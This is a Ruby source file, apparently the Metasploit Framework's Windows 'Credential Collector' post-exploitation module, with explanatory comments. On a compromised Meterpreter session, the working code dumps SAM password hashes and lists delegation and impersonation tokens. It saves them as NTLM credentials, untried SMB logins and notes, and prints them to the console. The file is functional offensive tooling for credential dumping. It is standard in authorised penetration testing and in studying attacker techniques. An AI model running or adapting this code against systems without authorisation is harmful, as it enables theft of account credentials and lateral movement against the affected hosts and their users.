GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/credential_collector.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
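class MetasploitModule < Msf::Post
  include Msf::Auxiliary::Report

  # Service tuple shared by every credential and login record this module
  # writes: the SAM hashes are reported against SMB on the session host.
  # Loop-invariant, so it is built once rather than per hash.
  SMB_SERVICE = { port: 445, service_name: 'smb', protocol: 'tcp' }.freeze

  # Standard Metasploit module metadata. The Meterpreter commands listed under
  # 'Compat' are the ones run below (token listing via incognito, SAM dump via
  # priv); the ATT&CK reference classifies the activity for reporting.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Credential Collector',
        'Description' => %q{
          This module harvests credentials found on the host and stores them in the database.
        },
        'License' => MSF_LICENSE,
        'Author' => ['tebo[at]attackresearch.com'],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              incognito_list_tokens
              priv_passwd_get_sam_hashes
            ]
          }
        },
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1003_OS_CREDENTIAL_DUMPING]
        ]
      )
    )
  end

  # Module entry point. Loads the priv and incognito extensions if the session
  # does not already carry them, reads the SAM hashes, stores each one as an
  # NTLM credential plus an UNTRIED login in the database, then records the
  # token listing as notes. Every credential and token is also echoed to the
  # console, so module output contains secret material.
  #
  # @raise [Rex::Script::Completed] when incognito returns no token listing
  def run
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
    print_status("Running module against #{hostname} (#{session.session_host})")

    # Make sure we're rockin Priv and Incognito
    session.core.use('priv') unless session.priv
    session.core.use('incognito') unless session.incognito

    # Target address for the db records
    addr = session.session_host

    store_sam_hashes(addr, dump_sam_hashes)
    store_tokens(addr)
  end

  private

  # Reads the SAM hashes through the priv extension. Any error is turned into
  # a module failure; the message names the usual cause (session process
  # architecture not matching the target).
  #
  # @return [Enumerable] hash entries responding to +lanman+, +ntlm+ and +user_name+
  def dump_sam_hashes
    client.priv.sam_hashes
  rescue StandardError
    fail_with(Failure::Unknown, "Error accessing hashes, did you migrate to a process that matched the target's architecture?")
  end

  # Records each SAM hash as an :ntlm_hash credential core and an UNTRIED
  # login against SMB on +addr+.
  #
  # @param addr [String] session host address used for the service record
  # @param hashes [Enumerable] entries returned by +dump_sam_hashes+
  def store_sam_hashes(addr, hashes)
    print_good('Collecting hashes...')

    # Same service information for every record; service keys win on merge,
    # matching the original merge! order.
    service_data = SMB_SERVICE.merge(address: addr)

    hashes.each do |hash|
      # Credential information; private_data is the LM:NT pair as one string
      credential_data = {
        origin_type: :session,
        session_id: session_db_id,
        post_reference_name: refname,
        private_type: :ntlm_hash,
        private_data: hash.lanman + ':' + hash.ntlm,
        username: hash.user_name,
        workspace_id: myworkspace_id
      }.merge(service_data)
      credential_core = create_credential(credential_data)

      # Options for the Metasploit::Credential::Login object
      login_data = {
        core: credential_core,
        status: Metasploit::Model::Login::Status::UNTRIED,
        workspace_id: myworkspace_id
      }.merge(service_data)
      create_credential_login(login_data)

      print_line " Extracted: #{credential_data[:username]}:#{credential_data[:private_data]}"
    end
  end

  # Lists the delegation and impersonation tokens visible through incognito
  # and stores each line of the listing as an 'smb_token' note on +addr+.
  #
  # @param addr [String] session host address the notes are attached to
  # @raise [Rex::Script::Completed] when no token listing is returned
  def store_tokens(addr)
    tokens = session.incognito.incognito_list_tokens(0)
    raise Rex::Script::Completed unless tokens

    # Meh, tokens come to us as a formatted string
    print_good 'Collecting tokens...'
    (tokens['delegation'] + tokens['impersonation']).split("\n").each do |token|
      print_line " #{token}"

      report_note(
        host: addr,
        type: 'smb_token',
        data: token,
        update: :unique_data
      )
    end
  end
end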